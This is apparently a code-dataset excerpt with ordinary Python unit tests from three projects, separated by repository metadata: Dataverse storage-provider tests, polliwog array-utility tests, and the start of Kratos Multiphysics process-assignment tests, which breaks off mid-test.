aiohttpretty.register_json_uri('GET', latest_published_url, body={'data': {'files': []}}) path = yield from provider.validate_path(path) metadata, created = yield from provider.upload(file_stream, path) entry = native_file_metadata['datafile'] expected = DataverseFileMetadata(entry, 'latest').serialized() assert metadata == expected assert created is False assert aiohttpretty.has_call(method='POST', uri=url) assert aiohttpretty.has_call(method='GET', uri=published_url) @async @pytest.mark.aiohttpretty def test_delete_file(self, provider, native_dataset_metadata): path = '21' url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'file', path) aiohttpretty.register_json_uri('DELETE', url, status=204) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) yield from provider.delete(path) assert aiohttpretty.has_call(method='DELETE', uri=url) # @async # @pytest.mark.aiohttpretty # def test_delete_file_invalid_path(self, provider, native_dataset_metadata): # path = '500' # draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) # aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) # published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) # aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) # with pytest.raises(exceptions.MetadataError): # yield from provider.delete(path) class TestMetadata: @async @pytest.mark.aiohttpretty def test_metadata(self, provider, native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest') assert len(result) == 3 assert result[0]['provider'] == 'dataverse' assert result[0]['kind'] == 'file' assert result[0]['name'] == 'UnZip.java' assert result[0]['path'] == '/19' assert result[0]['extra']['fileId'] == '19' @async @pytest.mark.aiohttpretty def test_metadata_no_files(self, provider, empty_native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=empty_native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest') assert result == [] @async @pytest.mark.aiohttpretty def test_metadata_published(self, provider, native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest-published') assert len(result) == 3 assert result[0]['provider'] == 'dataverse' assert result[0]['kind'] == 'file' assert result[0]['name'] == 'UnZip.java' assert result[0]['path'] == '/19' assert result[0]['extra']['fileId'] == '19' @async @pytest.mark.aiohttpretty def test_metadata_published_no_files(self, provider, empty_native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=empty_native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest-published') assert result == [] @async @pytest.mark.aiohttpretty def test_draft_metadata_missing(self, provider): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=404) path = yield from provider.validate_path('/') with pytest.raises(exceptions.MetadataError): yield from provider.metadata(path, version='latest') @async @pytest.mark.aiohttpretty def test_draft_metadata_no_state_catches_all(self, provider, native_dataset_metadata): draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path) assert isinstance(result, list) assert len(result) == 6 @async @pytest.mark.aiohttpretty def test_metadata_never_published(self, provider, native_dataset_metadata): published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=404) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path) assert len(result) == 3 @async @pytest.mark.aiohttpretty def test_metadata_never_published_raises_errors(self, provider, native_dataset_metadata): published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=400) path = yield from provider.validate_path('/') with pytest.raises(exceptions.MetadataError) as e: result = yield from provider.metadata(path) assert e.value.code == 400
40.101293
138
0.675928
2,066
18,607
5.899806
0.119555
0.039462
0.063746
0.046763
0.876282
0.844696
0.844696
0.810239
0.775371
0.754205
0
0.031893
0.182727
18,607
463
139
40.187905
0.769646
0.034718
0
0.714667
0
0.010667
0.231211
0.037551
0
0
0
0
0.077333
0
null
null
0
0.026667
null
null
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
8195f7feb3b7500d1838c7d287d97e45da55851f
3,942
py
Python
polliwog/polyline/test_array.py
lace/polliwog
7744ce171738e4739e391fcff4f4689d9f177196
[ "BSD-2-Clause" ]
18
2019-05-03T02:08:12.000Z
2022-03-24T11:49:59.000Z
polliwog/polyline/test_array.py
lace/polliwog
7744ce171738e4739e391fcff4f4689d9f177196
[ "BSD-2-Clause" ]
76
2019-04-03T15:24:01.000Z
2022-03-01T14:07:04.000Z
polliwog/polyline/test_array.py
lace/polliwog
7744ce171738e4739e391fcff4f4689d9f177196
[ "BSD-2-Clause" ]
3
2019-11-04T16:22:07.000Z
2022-03-09T08:50:52.000Z
import numpy as np from ._array import find_changes, find_repeats def test_find_repeats(): example = np.array([0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0]) np.testing.assert_array_equal( find_repeats(example, wrap=False), np.array( [ False, False, True, True, False, True, True, True, False, False, False, True, False, True, ] ), ) np.testing.assert_array_equal( find_repeats(example, wrap=True), np.array( [ True, False, True, True, False, True, True, True, False, False, False, True, False, True, ] ), ) example[-1] = 1 np.testing.assert_array_equal( find_repeats(example, wrap=False), np.array( [ False, False, True, True, False, True, True, True, False, False, False, True, False, False, ] ), ) np.testing.assert_array_equal( find_repeats(example, wrap=True), np.array( [ False, False, True, True, False, True, True, True, False, False, False, True, False, False, ] ), ) def test_find_changes(): example = np.array([0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0]) np.testing.assert_array_equal( find_changes(example, wrap=False), np.array( [ False, True, False, False, True, False, False, False, True, True, True, False, True, False, ] ), ) np.testing.assert_array_equal( find_changes(example, wrap=True), np.array( [ False, True, False, False, True, False, False, False, True, True, True, False, True, False, ] ), ) example[-1] = 1 np.testing.assert_array_equal( find_changes(example, wrap=False), np.array( [ False, True, False, False, True, False, False, False, True, True, True, False, True, True, ] ), ) np.testing.assert_array_equal( find_changes(example, wrap=True), np.array( [ True, True, False, False, True, False, False, False, True, True, True, False, True, True, ] ), )
21.540984
66
0.296043
267
3,942
4.254682
0.074906
0.229754
0.184859
0.150528
0.922535
0.922535
0.915493
0.915493
0.915493
0.899648
0
0.022023
0.631405
3,942
182
67
21.659341
0.759807
0
0
0.840909
0
0
0
0
0
0
0
0
0.045455
1
0.011364
false
0
0.011364
0
0.022727
0
0
0
0
null
1
1
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
819a0188456b2fb2f6c029ebcc56072dc4c4812f
69,474
py
Python
kratos/tests/test_processes.py
AndreaVoltan/MyKratos7.0
e977752722e8ef1b606f25618c4bf8fd04c434cc
[ "BSD-4-Clause" ]
2
2020-04-30T19:13:08.000Z
2021-04-14T19:40:47.000Z
kratos/tests/test_processes.py
AndreaVoltan/MyKratos7.0
e977752722e8ef1b606f25618c4bf8fd04c434cc
[ "BSD-4-Clause" ]
1
2020-04-30T19:19:09.000Z
2020-05-02T14:22:36.000Z
kratos/tests/test_processes.py
AndreaVoltan/MyKratos7.0
e977752722e8ef1b606f25618c4bf8fd04c434cc
[ "BSD-4-Clause" ]
1
2020-06-12T08:51:24.000Z
2020-06-12T08:51:24.000Z
from __future__ import print_function, absolute_import, division import KratosMultiphysics.KratosUnittest as KratosUnittest from KratosMultiphysics import * import KratosMultiphysics.kratos_utilities as kratos_utils import math import os def GetFilePath(fileName): return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName) class TestProcesses(KratosUnittest.TestCase): def test_assign_processes(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(VELOCITY) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part.AddNodalSolutionStepVariable(DENSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) #reset all data for node in model_part.Nodes: node.Free(DISPLACEMENT_X) node.Free(DISPLACEMENT_Y) node.Free(DISPLACEMENT_Z) node.Free(VELOCITY_X) node.Free(VELOCITY_Y) node.Free(VELOCITY_Z) node.SetSolutionStepValue(DENSITY,0,0.0) node.SetSolutionStepValue(VISCOSITY,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_X,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Y,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Z,0,0.0) node.SetSolutionStepValue(VELOCITY_X,0,0.0) node.SetSolutionStepValue(VELOCITY_Y,0,0.0) node.SetSolutionStepValue(VELOCITY_Z,0,0.0) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VISCOSITY", "interval" : [0.0, 10.0], "constrained" : true, "value" : "x+100.0*y*t**2" } }, { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DENSITY", "value" : "x*x+y*y+z*z+t" } }, { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT_X", "interval" : [0.0, 5.0], "constrained" : true, "value" : "sqrt(x**2+y**2)*t", "local_axes" :{ "origin" : [0.0, 0.0, 0.0], "axes" : [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0] ] } } }, { "python_module" : "assign_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "interval" : [11.0, 15.0], "value" : [10.0, null, "t"], "local_axes" : {} } }, { "python_module" : "assign_vector_by_direction_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "interval" : [11.0, 15.0], "modulus" : 10.0, "constrained" : false, "direction" : [1.0, 0.0, 0.0], "local_axes" : {} } }, { "python_module" : "assign_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "interval" : [20.0, 24.0], "constrained" : false, "value" : [10.0, null, "t"], "local_axes" : {} } }, { "python_module" : "assign_vector_by_direction_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "interval" : [20.0, 24.0], "modulus" : "sin(x*pi*t)", "constrained" : false, "direction" : [0.0, 1.0, 0.0], "local_axes" : {} } }, { "python_module" : "assign_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "interval" : [25.0, "End"], "constrained" : [true,true,false], "value" : [null, "x+y*t", "t"], "local_axes" : {} } }, { "python_module" : "assign_vector_by_direction_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "interval" : [25.0, "End"], "modulus" : "sqrt(abs(x*y))", "constrained" : true, "direction" : [0.0, 1.0, 1.0], "local_axes" : {} } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for node in model_part.Nodes: self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) ############################################################ ##time = 3 - both within the active interval model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), math.sqrt(node.X**2+node.Y**2)*t) self.assertEqual(node.GetSolutionStepValue(DENSITY), node.X**2+node.Y**2+node.Z**2+t) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), node.X+100.0*node.Y*t**2) self.assertTrue(node.IsFixed(DENSITY)) self.assertTrue(node.IsFixed(VISCOSITY)) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) ############################################################ ##time = 3 - DISPLACEMENT_X is not in the active interval model_part.CloneTimeStep(6.0) for node in model_part.Nodes: self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), math.sqrt(node.X**2+node.Y**2)*3.0) ##still the old value self.assertEqual(node.GetSolutionStepValue(DENSITY), node.X**2+node.Y**2+node.Z**2+t) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), node.X+100.0*node.Y*t**2) self.assertTrue(node.IsFixed(DENSITY)) self.assertTrue(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) #it is left unfixed at the end of the previous interval for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) ############################################################ ##time = 12 - DISPLACEMENT applied as a vector. x,z components fixed, y component not imposed ##time = 12 - VELOCITY applied as a vector by componentes. All components free. x component is not zero. model_part.CloneTimeStep(12.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 10.0) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) #not applied!! self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 12.0) self.assertTrue(node.IsFixed(DISPLACEMENT_Z)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 10.0) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Y), 0.0) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Z), 0.0) self.assertFalse(node.IsFixed(VELOCITY_Z)) #print("**********************************************") for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ############################################################ ##time >= 20 - DISPLACEMENT applied as a vector. x,z components fixed, y component not imposed ##time >= 20 - VELOCITY applied as a vector by componentes. All components free. y component is not zero. model_part.CloneTimeStep(20.1) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] #print("Checking time = ", t) for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 10.0) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) #not applied!! self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), t) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Y), math.sin(node.X*math.pi*t)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_Z), 0.0) self.assertFalse(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ############################################################ ##time >= 25 - DISPLACEMENT applied as a vector. x,z components fixed, y component not imposed ##time >= 25 - VELOCITY applied as a vector by componentes. All components fixed. y and z components are not zero. model_part.CloneTimeStep(26.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] #print("Checking time = ", t) for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 10.0) #previous value self.assertFalse(node.IsFixed(DISPLACEMENT_X)) #not fixed since set as null self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), node.X+node.Y*t) #not applied!! self.assertTrue(node.IsFixed(DISPLACEMENT_Y)) #set to true self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), t) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertTrue(node.IsFixed(VELOCITY_X)) self.assertAlmostEqual(node.GetSolutionStepValue(VELOCITY_Y), (math.sqrt(abs(node.X*node.Y)))/math.sqrt(2)) self.assertTrue(node.IsFixed(VELOCITY_Y)) self.assertAlmostEqual(node.GetSolutionStepValue(VELOCITY_Z), (math.sqrt(abs(node.X*node.Y)))/math.sqrt(2)) self.assertTrue(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() def test_rotated_system(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(VELOCITY) model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) #note that y and z are inverted in the rotated system settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VISCOSITY", "interval" : [0.0, 10.0], "constrained" : false, "value" : "x+100.0*y*t**2", "local_axes" :{ "origin" : [10.0, 0.0, 0.0], "axes" : [[1.0, 0.0, 0.0], [0.0, 0.0, 1.0], [0.0, 1.0, 0.0] ] } } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: x = node.X - 10.0 y = node.Z z = node.Y self.assertEqual(node.GetSolutionStepValue(VISCOSITY), x+100.0*y*t**2) self.assertFalse(node.IsFixed(VISCOSITY)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() def test_assign_scalar_value_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "PRESSURE", "value" : 15.0 } }, { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "VISCOSITY", "value" : 2 } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for cond in model_part.Conditions: self.assertEqual(cond.GetValue(PRESSURE), 15.0) self.assertEqual(cond.GetValue(VISCOSITY), 2) def test_assign_scalar_field_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "INITIAL_STRAIN", "value" : "x+y*t+z" } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(5.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() t = model_part.ProcessInfo[TIME] for cond in model_part.Conditions: v = cond.GetValue(INITIAL_STRAIN) i = 0 for node in cond.GetNodes(): self.assertEqual(v[i],node.X+node.Y*t+node.Z) i=i+1 def test_assign_scalar_field_scalar_variable_to_conditions(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "PRESSURE", "value" : "t" } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(5.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() t = model_part.ProcessInfo[TIME] for cond in model_part.Conditions: v = cond.GetValue(PRESSURE) self.assertEqual(v,t) def test_assign_scalar_field_component_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_to_conditions_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableToConditionsProcess", "Parameters" : { "model_part_name":"Main", "variable_name": "DISPLACEMENT_X", "value" : "t" } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(5.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() t = model_part.ProcessInfo[TIME] for cond in model_part.Conditions: v = cond.GetValue(DISPLACEMENT) self.assertEqual(v[0],t) def test_find_nodal_h_process(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(NODAL_H) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) FindNodalHProcess(model_part).Execute(); for i in range(1,len(model_part.Nodes)): self.assertEqual(model_part.GetNode(i).GetSolutionStepValue(NODAL_H), 0.25) self.assertEqual(model_part.GetNode(len(model_part.Nodes)).GetSolutionStepValue(NODAL_H), 0.5) def test_assign_acceleration_to_nodes(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_time_derivative_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignTimeDerivativeProcess", "Parameters" : { "model_part_name":"Main", "variable_name" : "ACCELERATION", "variable_to_be_solved_for" : "DISPLACEMENT", "value" : ["t",null,"z"], "interval" : [3.0,4.0] } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) ################### here we are within the interval model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), True) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), True) self.assertEqual(node.IsFixed(DISPLACEMENT_X), True) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), True) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), False) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), False) self.assertEqual(node.IsFixed(DISPLACEMENT_X), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), False) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) ################### here we are outside of the interval - values do not change but everything is free model_part.CloneTimeStep(8.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), False) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), False) self.assertEqual(node.IsFixed(DISPLACEMENT_X), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), False) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() for node in model_part.Nodes: self.assertEqual(node.IsFixed(ACCELERATION_X), False) self.assertEqual(node.IsFixed(ACCELERATION_Y), False) self.assertEqual(node.IsFixed(ACCELERATION_Z), False) self.assertEqual(node.IsFixed(DISPLACEMENT_X), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Y), False) self.assertEqual(node.IsFixed(DISPLACEMENT_Z), False) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_X), 3.0) #t = 3.0 self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(ACCELERATION_Z), node.Z) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) #displacements remain unmodified, they will be assigned by the scheme self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Y), 0.0) self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_Z), 0.0) def test_assign_vector_variable_to_conditions(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.CreateNewNode(1,0.5,0.5,0.5) model_part.CreateNewNode(2,1.0,1.0,1.0) model_part.CreateNewCondition("LineCondition2D2N",1,[1,2], model_part.GetProperties()[1]) settings = Parameters( """ { "process_list" : [ { "python_module" : 